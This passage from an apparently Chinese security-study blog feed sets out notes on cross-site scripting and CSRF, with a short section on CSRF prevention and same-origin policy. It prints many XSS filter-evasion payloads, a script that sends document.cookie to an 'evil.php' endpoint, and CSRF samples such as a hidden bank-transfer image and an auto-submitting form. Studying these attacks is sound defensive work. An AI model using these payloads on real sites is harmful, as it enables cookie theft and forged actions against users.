<tr><br> <td><</td><br> <td>小于号</td><br> <td>&lt;</td><br> <td>&#60;</td><br> </tr><br> <tr><br> <td>></td><br> <td>大于号</td><br> <td>&gt;</td><br> <td>&#62;</td><br> </tr><br> <tr><br> <td>&</td><br> <td>和号</td><br> <td>&amp;</td><br> <td>&#38;</td><br> </tr><br> <tr><br> <td>“</td><br> <td>引号</td><br> <td>&quot;</td><br> <td>&#34;</td><br> </tr><br> <tr><br> <td>‘</td><br> <td>撇号 </td><br> <td>&apos; (IE不支持)</td><br> <td>&#39;</td><br> </tr><br></tbody><br></table><p>Unicode编码<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">a</span> <span class="attr">onclick</span>=<span class="string">"javascript:alert(/xss/)"</span>></span>click<span class="tag"></<span class="name">a</span>></span></div><div class="line"><span class="tag"><<span class="name">a</span> <span class="attr">onclick</span>=<span class="string">"&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#120;&#115;&#115;&#47;&#41;"</span>></span>click<span class="tag"></<span class="name">a</span>></span></div></pre></td></tr></table></figure></p><ol><li>单引号</li></ol><p><code><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></code></p><ol><li>其他</li></ol><p>使用tab键空开<br><code><IMG SRC="jav ascript:alert('XSS');"></code></p><p>编码tab<br><code><IMG SRC="jav&#x09;ascript:alert('XSS');"></code></p><p>使用制表符, 换行符和回车符</p><blockquote><p>加入新行; Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. </p></blockquote><p><code><IMG SRC="jav&#x0A;ascript:alert('XSS');"></code></p><table border="0" cellspacing="0" cellpadding="0"><br><tbody><br><tr><br><td>Type</td><br><td>Horizontal Tab</td><br><td>New line</td><br><td>Carriage Return</td><br></tr><br><tr><br><td>URL</td><br><td>%09</td><br><td>%10</td><br><td>%13</td><br></tr><br><tr><br><td>Minimal Sized Hex</td><br><td>&#x9</td><br><td>&#xA</td><br><td>&#xD</td><br></tr><br><tr><br><td>Maximum Sized Hex</td><br><td>&#x0000009;</td><br><td>&#x000000A;</td><br><td>&#x000000D;</td><br></tr><br><tr><br><td>Minimum Sized Decimal</td><br><td>&#9</td><br><td>&#10</td><br><td>&#13</td><br></tr><br><tr><br><td>Maximum Sized Decimal</td><br><td>&#x0000009;</td><br><td>&#x0000009;</td><br><td>&#0000009;</td><br></tr><br></tbody><br></table><h1 id="Cross-Site-Request-Forgery-CSRF-跨站脚本请求伪造"><a href="#Cross-Site-Request-Forgery-CSRF-跨站脚本请求伪造" class="headerlink" title="Cross-Site Request Forgery (CSRF) 跨站脚本请求伪造"></a>Cross-Site Request Forgery (CSRF) 跨站脚本请求伪造</h1><p>向服务器提交数据</p><p><img src="https://www.owasp.org//images/f/f3/Session_riding.GIF" alt=""></p><p>在a.com中访问b.com(或者受害者通过邮件点击访问example.com/delete?rule=*),<strong>某些浏览器将自动发送其cookie</strong>。<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">"http://b.com/test.php"</span>></span><span class="tag"></<span class="name">iframe</span>></span></div></pre></td></tr></table></figure></p><ul><li>自动删除文章</li><li>自动添加管理员账号</li></ul><p>GET scenario<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://bank.com/transfer.do?acct=MARIA&amount=100000"</span> <span class="attr">width</span>=<span class="string">"0"</span> <span class="attr">height</span>=<span class="string">"0"</span> <span class="attr">border</span>=<span class="string">"0"</span>></span></div></pre></td></tr></table></figure></p><p>POST scenario<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line"><span class="comment"><!-- csrftest.html --></span></div><div class="line"><span class="tag"><<span class="name">html</span>></span></div><div class="line"><span class="tag"><<span class="name">body</span> <span class="attr">onload</span>=<span class="string">'document.CSRF.submit()'</span>></span></div><div class="line"><span class="comment"><!-- 如果表单中存在name='submit'会冲突 --></span></div><div class="line"><span class="tag"><<span class="name">form</span> <span class="attr">action</span>=<span class="string">'http://tagetWebsite/Authenticate.jsp'</span> <span class="attr">method</span>=<span class="string">'POST'</span> <span class="attr">name</span>=<span class="string">'CSRF'</span>></span></div><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">'hidden'</span> <span class="attr">name</span>=<span class="string">'name'</span> <span class="attr">value</span>=<span class="string">'Hacked'</span>></span></div><div class="line"><span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">'hidden'</span> <span class="attr">name</span>=<span class="string">'password'</span> <span class="attr">value</span>=<span class="string">'Hacked'</span>></span></div><div class="line"><span class="tag"></<span class="name">form</span>></span></div><div class="line"></div><div class="line"><span class="tag"></<span class="name">body</span>></span></div><div class="line"><span class="tag"></<span class="name">html</span>></span></div></pre></td></tr></table></figure></p><p>结合XSS漏洞攻击将悄无声息。</p><h4 id="Prevent-CSRF-Vulnerabilities"><a href="#Prevent-CSRF-Vulnerabilities" class="headerlink" title="Prevent CSRF Vulnerabilities"></a>Prevent CSRF Vulnerabilities</h4><ol><li><p>Check standard headers to verify the request is same origin </p><ul><li>Origin Header </li><li>Referer Header (绕过referer)</li></ul></li><li><p>AND Check CSRF token </p></li></ol><h4 id="same-origin-policy"><a href="#same-origin-policy" class="headerlink" title="same-origin policy"></a>same-origin policy</h4><blockquote><p>同源策略:同协议、域名、端口,不能跨域访问。</p></blockquote><p><img src="http://i.imgur.com/dswMO29.png" alt=""></p><p>如何实现跨域访问?</p><p>1. Access-Control-Allow-Origin 头</p><p>a.com 允许其他域访问本域资源<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><?php</span> header(<span class="string">"Access-Control-Allow-Origin: *"</span>); <span class="meta">?></span></div></pre></td></tr></table></figure></p><p>b.com<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">$.get(<span class="string">"http://a.com/test.php"</span>, <span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{</div><div class="line">alert(data);</div><div class="line">});</div></pre></td></tr></table></figure></p><p>2. getJSON<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$.getJSON(<span class="string">"http://www.runoob.com/try/ajax/jsonp.php?jsoncallback=?"</span>, <span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{ <span class="comment">// 对返回的json的处理代码 });</span></div></pre></td></tr></table></figure></p><p>3. iframe</p><h4 id="跨域策略文件"><a href="#跨域策略文件" class="headerlink" title="跨域策略文件"></a>跨域策略文件</h4><p>crossdomain.xml</p>]]></content>
<summary type="html">
<h1 id="Cross-site-Scripting-XSS-跨站脚本"><a href="#Cross-site-Scripting-XSS-跨站脚本" class="headerlink" title="Cross-site Scripting (XSS) 跨站脚本"></a>Cross-site Scripting (XSS) 跨站脚本</h1><p>恶意代码注入</p>
<h4 id="XSS-using-Script-in-Attributes"><a href="#XSS-using-Script-in-Attributes" class="headerlink" title="XSS using Script in Attributes"></a>XSS using Script in Attributes</h4><p>XSS attacks may be conducted without using <script></script> tags. Other tags will do exactly the same thing, for example:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">body</span> <span class="attr">onload</span>=<span class="string">alert(</span>'<span class="attr">test1</span>')&gt;</span></div></pre></td></tr></table></figure></p>
<p>or other attributes like: onmouseover, onerror.<br>onmouseover<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">b</span> <span class="attr">onmouseover</span>=<span class="string">alert(</span>'<span class="attr">Wufff</span>!')&gt;</span>click me!<span class="tag">&lt;/<span class="name">b</span>&gt;</span></div></pre></td></tr></table></figure></p>
<p>onerror<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://url.to.file.which/not.exist"</span> <span class="attr">onerror</span>=<span class="string">alert(document.cookie);</span>&gt;</span></div></pre></td></tr></table></figure></p>
<h4 id="XSS-using-Script-Via-Encoded-URI-Schemes"><a href="#XSS-using-Script-Via-Encoded-URI-Schemes" class="headerlink" title="XSS using Script Via Encoded URI Schemes"></a>XSS using Script Via Encoded URI Schemes</h4><p>使用编码绕过过滤 如:a=&amp;#X41 (UTF-8)<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">IMG</span> <span class="attr">SRC</span>=<span class="string">j&amp;#X41vascript:alert(</span>'<span class="attr">test2</span>')&gt;</span></div></pre></td></tr></table></figure></p>
<h4 id="XSS-using-code-encoding"><a href="#XSS-using-code-encoding" class="headerlink" title="XSS using code encoding"></a>XSS using code encoding</h4><p>We may encode our script in base64 and place it in META tag.</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">META</span> <span class="attr">HTTP-EQUIV</span>=<span class="string">"refresh"</span> <span class="attr">CONTENT</span>=<span class="string">"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"</span>&gt;</span></div></pre></td></tr></table></figure>
<p>伪协议<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="</span>&gt;</span>click<span class="tag">&lt;/<span class="name">a</span>&gt;</span></div></pre></td></tr></table></figure></p>
<h2 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h2><p>获取用户cookies</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">SCRIPT</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>&gt;</span><span class="undefined"></span></div><div class="line"><span class="javascript"><span class="keyword">var</span> adr = <span class="string">'../evil.php?cakemonster='</span> + <span class="built_in">escape</span>(<span class="built_in">document</span>.cookie);</span></div><div class="line"><span class="undefined"></span><span class="tag">&lt;/<span class="name">SCRIPT</span>&gt;</span></div></pre></td></tr></table></figure>
</summary>
</entry>
</feed>